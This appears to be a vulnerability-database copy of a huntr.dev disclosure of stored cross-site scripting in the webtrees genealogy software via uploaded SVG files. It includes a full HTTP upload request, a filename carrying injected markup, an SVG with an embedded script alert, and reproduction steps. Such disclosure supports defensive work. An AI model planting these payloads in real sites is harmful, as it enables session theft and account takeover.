Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrNoobpkAFC02117-C033-4B81-9763-DC7971C0CC9B
HistoryOct 08, 2021 - 11:49 a.m.

Cross-site Scripting (XSS) - Stored in fisharebest/webtrees

2021-10-0811:49:17
noobpk
www.huntr.dev
9
JSON

Description

Stored XSS via upload file .svg allows for arbitrary execution of JavaScript

Proof of Concept

// PoC.req
POST /demo-dev/tree/demo/add-media-file/X9222 HTTP/2
Host: dev.webtrees.net
Cookie: __Secure-WT-ID=63trarcpiic93psog3t8okts4h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine
Content-Type: multipart/form-data; boundary=---------------------------405026258827833307651807573856
Content-Length: 1752
Origin: https://dev.webtrees.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="_csrf"

NktwFM88jQhclDtOWaJYcd0o77F8n5BI
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file_location"

upload
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file"; filename="xss'&gt;<img src>.svg"
Content-Type: image/svg+xml

&lt;?xml version="1.0" standalone="no"?&gt;
&lt;!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"&gt;

&lt;svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"&gt;
   &lt;rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /&gt;
   &lt;script type="text/javascript"&gt;
      alert("Ghostlulz XSS");
   &lt;/script&gt;
&lt;/svg&gt;
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="auto"

0
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="folder"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="new_file"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="unused"

0_Artémis_(Diane)_-_Galleria_dei_Candelabri_-_Vatican.JPG
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="remote"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="title"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="type"


-----------------------------405026258827833307651807573856--

Step to Reproduct

Create a file .svg contain payload

Example

&lt;?xml version="1.0" standalone="no"?&gt;
&lt;!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"&gt;

&lt;svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"&gt;
   &lt;rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /&gt;
   &lt;script type="text/javascript"&gt;
      alert("Ghostlulz XSS");
   &lt;/script&gt;
&lt;/svg&gt;

Goto details of a person. Example: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine

At Edit button choose to ‘Add a media file’

Upload the file .svg and save it

The XSS will trigger when user click to file media. It will load file svg and trigger xss

Impact

This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.

JSON